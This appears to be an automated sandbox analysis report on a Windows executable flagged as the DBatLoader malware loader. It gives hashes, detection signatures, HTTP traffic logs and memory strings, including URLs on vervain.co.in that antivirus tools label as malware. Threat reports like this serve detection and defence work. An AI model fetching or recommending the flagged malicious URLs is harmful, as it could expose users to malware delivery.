Windows Analysis Report
ncIpox4w8f

Overview

General Information

Sample Name: ncIpox4w8f (renamed file extension from none to exe)
Analysis ID: 679306
MD5: 03fb0f9df279b56130a63d5330461789
SHA1: 705d9c59fe6cdeec9e28d1d803cb94765d1dc4de
SHA256: 59290e0709f6bc918c12c38604eaabcd79b77f699ca2f1abf3af4fccef444a94
Tags: exe
Infos:

Detection

DBatLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected DBatLoader
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • ncIpox4w8f.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\ncIpox4w8f.exe" MD5: 03FB0F9DF279B56130A63D5330461789)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
ncIpox4w8f.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

Source | Rule | Description | Author | Strings
0.0.ncIpox4w8f.exe.400000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: ncIpox4w8f.exe | Avira: detected
Source: ncIpox4w8f.exe | Virustotal: Detection: 52%
Source: ncIpox4w8f.exe | ReversingLabs: Detection: 55%
Source: https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk | Avira URL Cloud: Label: malware
Source: vervain.co.in | Virustotal: Detection: 7%
Source: 0.2.ncIpox4w8f.exe.2a34530.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: ncIpox4w8f.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 199.79.62.221:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 199.79.62.221
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Fri, 05 Aug 2022 13:08:22 GMT; Server: Apache; Upgrade: h2,h2c; Connection: Upgrade, close; Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT; Accept-Ranges: bytes; Content-Length: 583; Vary: Accept-Encoding; Content-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:23 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:26 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:28 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:30 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:31 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:38 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:39 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:41 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:42 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:43 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:45 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:46 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:47 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:49 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:50 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:51 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:53 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:08:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:01 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:02 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:03 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:08 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:10 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:11 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:13 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:14 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 13:09:16 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 23:01:27 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
                Source: ncIpox4w8f.exe, 00000000.00000002.515000717.00000000007F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: ncIpox4w8f.exe String found in binary or memory: http://www.emerge.de
                Source: ncIpox4w8f.exe, 00000000.00000003.348605602.000000000581A000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.374747011.0000000005726000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.248325276.0000000005350000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.304035366.0000000005614000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.350592323.0000000005833000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.293371459.000000000561C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.501025618.000000000591C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.400260793.0000000005904000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445878505.0000000005921000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.334512087.000000000536E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.261256374.000000000541C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.546359558.00000000058FC000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.248105696.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.387645922.0000000005915000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.266085426.000000000542C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286385327.00000000053E8000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.391278569.0000000005914000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 
00000000.00000003.260726768.00000000054E9000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.355852428.0000000005851000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.emerge.deDVarFileInfo$
                Source: ncIpox4w8f.exe, ncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.240443204.00000000029B8000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.289638766.0000000004F68000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.293026511.0000000005550000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.251263320.0000000005388000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.292545915.0000000005344000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.326228795.000000000552E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.258002144.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.338081452.000000000547E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.337053722.0000000005478000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324769245.0000000005528000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.245693873.0000000004940000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, 
ncIpox4w8f.exe, 00000000.00000003.333581477.0000000005518000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pregrad.net
                Source: ncIpox4w8f.exe, 00000000.00000003.267479672.0000000005250000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.240443204.00000000029B8000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, ncIpox4w8f.exe, 00000000.00000003.261407563.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.289638766.0000000004F68000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.528757099.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.293026511.0000000005550000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.251263320.0000000005388000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.292545915.0000000005344000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.316597179.000000000540C000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.326228795.000000000552E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.297908164.0000000005536000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.258002144.0000000005450000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.388263630.000000000571D000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.338081452.000000000547E000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.337053722.0000000005478000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324769245.0000000005528000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.245693873.0000000004940000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 
00000000.00000003.333581477.0000000005518000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.256226314.0000000005450000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pregrad.netopenU
                Source: ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.486329715.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.348023678.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.440772986.00000000007D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vervain.co.in/
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 
00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk
                Source: ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1
                Source: ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2
                Source: ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk24e
                Source: ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2t
